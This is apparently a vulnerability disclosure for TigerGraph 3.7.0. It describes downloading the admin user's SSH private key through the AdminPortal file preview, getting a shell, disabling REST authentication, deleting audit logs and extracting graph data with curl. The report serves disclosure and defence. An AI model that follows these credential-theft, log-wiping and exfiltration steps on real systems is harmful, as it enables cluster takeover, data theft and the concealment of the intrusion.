The TigerGraph platform runs all system services using a single administrative user — tigergraph — who has the ability to remotely login to other remote nodes within the TigerGraph cluster using the SSH protocol. The installation guide details this as a precondition for installing TigerGraph in a clustered configuration and the set of administrative commands that are available to the Tigergraph user due to this configuration can be found in the (legacy) documentation.

This report shows that the TigerGraph platform does not sufficiently protect the SSH credentials of the administrative user and how this can be exploited to give an attacker full control over an entire TigerGraph cluster and underlying servers.


Severe. This vulnerability is a vector that can be used to obtain administrative privileges on a remote TigerGraph platform. This increases the severity of CVE-2022-30331 as it highlights that there are multiple ways of obtaining administrative level privileges either by utilizing existing vulnerabilities, like CVE-2023-22950 (data loading) and CVE-2023-22949 (logging user credentials). Once an attacker has access to an administrative shell then they have full control over the entire TigerGraph cluster and underlying servers.

Products/Versions Affected

  • TigerGraph Enterprise Free Edition 3.7.0 Docker Image
  • TigerGraph Enterprise Free Edition 3.7.0
  • TigerGraph Cloud

We suspect that this vulnerability is present in all existing TigerGraph products (although this is not confirmed).

Steps to Reproduce

Download and Run TigerGraph

Using docker download at the latest TigerGraph image and start the server:

1.) Optional: clean-up old TigerGraph docker images and obtain the latest version:
docker rm tigergraph
docker pull
2.) Download and run the docker image (note: we do not need to attach a volume):
docker run -d \
-p 14022:22 \
-p 9000:9000 \
-p 14240:14240 \
--name tigergraph \
--ulimit nofile=1000000:1000000 \
3.) Once the container has started, connect to it via ssh (note: the default password is ‘tigergraph’):
ssh -p 14022 tigergraph@localhost
4.) Start all TigerGraph services:
gadmin start all
5.) Using GSQL, create a new graph called test and add a node to it:
$ gsql
GSQL> CREATE VERTEX Node(PRIMARY_ID id UINT, value STRING) WITH primary_id_as_attribute="true"
GSQL> begin
GSQL> end
GSQL> interpret query ins(1,"hello”)
6.) Enable RESTPP authentication
gadmin config set RESTPP.Factory.EnableAuth true
gadmin config apply -y
gadmin restart restpp nginx gui gsql -y

Obtaining Administrative SSH Credentials

To demonstrate that SSH credentials of the administrative user are readily obtainable we download them via the AdminPortal. Although, this step assumes that the login credentials of the administrative user are known; a situation that is plausible (see CVE-2023-22949 which details how to locate the login credentials of the administrative user within the system logs).

If however, the login credentials are not known, the SSH credentials can also be exfiltrated from the TigerGraph platform using the technique described in CVE-2023-22950 where a user with low-levels of privilege is able to exploit a weakness in GSQL to load data from arbitrary files into the database. We also found that it is possible to exfiltrate SSH credentials under normal operating conditions by exploiting GSQL’s UDF facility to read arbitrary files (see CVE-2022-30331).

Login To The AdminPortal

The simplest way to obtain the administrative users login credentials is using AdminStudio and to do this follow these steps:

1.) Open a web-browser and go to https://localhost:1420 where you will be able to login to GraphStudio using the tigergraph user: 2.) Click on the “Admin” button on the top-right corner to switch into administrative mode (called the AdminPortal).

Downloading SSH Credential via AdminPortal

Once logged into the AdminPortal follow the following steps to download the SSH private key of the tigergraph user:

  1. On the left-hand side expand the “Others” menu.
  2. Click on “GSQL Output File” to open the file preview pane.
  3. In the “File path” textbox enter the text “/home/tigergraph/.ssh/tigergraph_rsa“.
  4. Click “Preview” to check that the file exists – if it does the first few lines will be displayed.
  5. Finally, click “Download” and the file will be downloaded to your local computer. On our system it was called m1_tigergraph_rsa.

Using The SSH Credentials To Obtain Access

Once the SSH credentials of the administrative user have been obtained they can be used to authenticate with the remote TigerGraph server and obtain shell access as the administrative user without requiring a password.

1.) Change the file permissions and load the credentials into your SSH keychain:
chmod 0600 m1_tigergraph_rsa

ssh-add -l
The agent has no identities.

ssh-add m1_tigergraph_rsa
Identity added: m1_tigergraph_rsa (m1_tigergraph_rsa)
ssh-add -l
4096 SHA256:vLvC0SaCrFDiJ/BbcP7c0GcA3tBoXxq+Om9kZg+t14Q m1_tigergraph_rsa (RSA)
2.) Using this private SSH key it is possible to login to the remote TigerGraph server as the administrative user (tigergraph) without requiring a password via SSH. In our docker setup we simply connect to localhost on port 14022:
ssh tigergraph@localhost -p 14022
The authenticity of host '[localhost]:14022 ([::1]:14022)' can't be established.
ED25519 key fingerprint is SHA256:zQKFdcNAdX7TwiBtQT1vuDdHWm2o07kS/mcwnSFeMYY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[localhost]:14022' (ED25519) to the list of known hosts.
james@localhost's password:

Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.10.104-linuxkit x86_64)

* Documentation:
* Management:
* Support:

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Jun 20 12:28:10 2022 from

If successful, you should see a shell session in which you can freely execute commands as the tigergraph user:

Circumventing Security Features And Exfiltrating Data

Now that we have shell access as the administrative user, we can now disable authentication for the REST API and wipe out a selection of the systems audit logs:

tigergraph@092eb28b2d49:~$ gadmin config set RESTPP.Factory.EnableAuth false
[   Info] Configuration has been changed. Please use 'gadmin config apply' to persist the changes.
tigergraph@092eb28b2d49:~$ gadmin config apply
[   Note] Changes:
RESTPP.Factory.EnableAuth: true -> false
Proceed to apply? (y/N)y
[   Info] Successfully applied configuration change. Please restart services to make it effective immediately.
tigergraph@092eb28b2d49:~$ gadmin restart restpp nginx gui gsql -y
[   Info] Stopping NGINX RESTPP GSQL GUI
tigergraph@092eb28b2d49:~$ rm gsql/* restpp/* controller/*

To prove that authentication is disabled we now exfiltrate some sensitive data from a second graph `test` that has zero authorized users:

curl -X GET "https://localhost:14240/restpp/graph/test/vertices/Node"